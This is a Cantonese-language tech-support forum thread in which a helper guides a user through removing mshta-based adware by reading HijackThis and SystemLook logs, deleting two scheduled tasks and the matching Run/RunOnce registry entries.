O23 - Service: Skype Updater (SkypeUpdate) - Skype Technologies - C:\Program Files (x86)\Skype\Updater\Updater.exe
O23 - Service: @%SystemRoot%\system32\snmptrap.exe,-3 (SNMPTRAP) - Unknown owner - C:\Windows\System32\snmptrap.exe (file missing)
O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\Windows\System32\spoolsv.exe (file missing)
O23 - Service: @%SystemRoot%\system32\sppsvc.exe,-101 (sppsvc) - Unknown owner - C:\Windows\system32\sppsvc.exe (file missing)
O23 - Service: NVIDIA Stereoscopic 3D Driver Service (Stereo Service) - NVIDIA Corporation - C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
O23 - Service: @%SystemRoot%\system32\ui0detect.exe,-101 (UI0Detect) - Unknown owner - C:\Windows\system32\UI0Detect.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vaultsvc.dll,-1003 (VaultSvc) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\Windows\System32\vds.exe (file missing)
O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\Windows\system32\vssvc.exe (file missing)
O23 - Service: @%SystemRoot%\system32\Wat\WatUX.exe,-601 (WatAdminSvc) - Unknown owner - C:\Windows\system32\Wat\WatAdminSvc.exe (file missing)
O23 - Service: @%systemroot%\system32\wbengine.exe,-104 (wbengine) - Unknown owner - C:\Windows\system32\wbengine.exe (file missing)
O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\Windows\system32\wbem\WmiApSrv.exe (file missing)
O23 - Service: @%PROGRAMFILES%\Windows Media Player\wmpnetwk.exe,-101 (WMPNetworkSvc) - Unknown owner - C:\Program Files (x86)\Windows Media Player\wmpnetwk.exe (file missing)

COMBOFIX 係下一帖

nick888 2014-12-12 06:08 PM

回覆 6# 的帖子

COMBOFIX
[url=https://www.sendspace.com/file/zfixk0]https://www.sendspace.com/file/zfixk0[/url]

nick888 2014-12-12 06:12 PM

回覆 6# 的帖子

岩岩重開左一次電腦, 都仲係有...
點算?

andrew412345 2014-12-12 07:07 PM

因為你中既係變種既 mshta malware 用一般既防毒軟件都唔會咁快掃到佢.
現在只能一步步跟番佢從咩途徑每一次刪除後自動重新添加, 從而切底刪除.我唔係E個 forum 既專業病毒團隊既人..只係咁岩路過見到你有睇POST有貼上HijackThis就試幫你 ONLY.唔係太多時間可以係度. 唔好咁心急.E個 Forum 個專業團隊好似消失左....所以冇人一齊研究的- -.得我一個睇ONLY

[color=#ff0000][u]Step 1 : 下載及執行 SREng[/u][/color]

[list][*]下載 [url=http://www.kztechs.com/sreng/download.html][url=http://ichbhk.com/sreng2.zip]SREng[/url][/url] 至桌面,並解壓縮檔案[*]執行 [color=blue]SREng[/color],並按一下[color=darkgreen]智慧掃瞄[/color][*]按一下[color=darkgreen]掃瞄[/color],[color=blue]SREng[/color] 會進行掃瞄,請耐心等待[*]按[color=darkgreen]保存報告[/color],並儲存它[/list]
[u][color=red][u][color=red][/color][/u]Step 2 : 下載及執行 SystemLook[/color][/u]

[list][*]下載 [url=http://jpshortstuff.247fixes.com/SystemLook.exe][color=#000000]SystemLook[/color][/url] 至桌面,並執行 [color=blue]SystemLook[/color][*]於視窗內貼上以下內容,然後按 [color=darkgreen]Look[/color]引用:[indent]:regfind
bv1LwaYz5ewPOfJVnYzXK7ZYjMi
2D46B6DC-2207-486B-B523-A557E6D54B47
RegWrite
SystemBoot[/indent][*]然後會彈出 [color=blue]SystemLook[/color] 報告,把它儲存[/list]

[u][color=red]Step 3 : 貼上報告[/color][/u]

[list=1][*]SystemLook[*][color=blue]SREng[/color][/list]

nick888 2014-12-12 07:56 PM

回覆 10# 的帖子

1.
SystemLook 30.07.11 by jpshortstuff
Log created at 19:53 on 12/12/2014 by User
Administrator - Elevation successful
WARNING: SystemLook running under WOW64. Use SystemLook_x64 for accurate results.
========== regfind ==========
Searching for " bv1LwaYz5ewPOfJVnYzXK7ZYjMi"
No data found.
Searching for " 2D46B6DC-2207-486B-B523-A557E6D54B47"
No data found.
Searching for " RegWrite"
No data found.
Searching for " SystemBoot"
No data found.
-= EOF =-

nick888 2014-12-12 07:58 PM

回覆 10# 的帖子

2.
[url]https://www.sendspace.com/file/vhmcwa[/url]

andrew412345 2014-12-12 07:58 PM

差 SREng 份 Report

andrew412345 2014-12-12 08:17 PM

去 :
「工作排程器」>「工作排程器程式庫」>
刪除 :
RegWrite
SystemBoot



執行 > Regedit >
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

刪除 :
SystemBootBkNETbv1LwaYz5ewPOfJVnYzXK7ZYjMi
RegWriteBkNETbv1LwaYz5ewPOfJVnYzXK7ZYjMi

去 :
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
刪除 :
RegWriteBkNETbv1LwaYz5ewPOfJVnYzXK7ZYjMi



如無意外, 應該就OK的了.
再有問題再POST SREng Report 同 HijackThis

nick888 2014-12-13 01:41 AM

回覆 14# 的帖子

YES! 暫時冇問題啦!!! 十萬個感謝!! THANK YOU SO MUCH!!!
頁: [1]
查看完整版本: 電腦彈廣告,PLZ HELP (附HIJACKTHIS)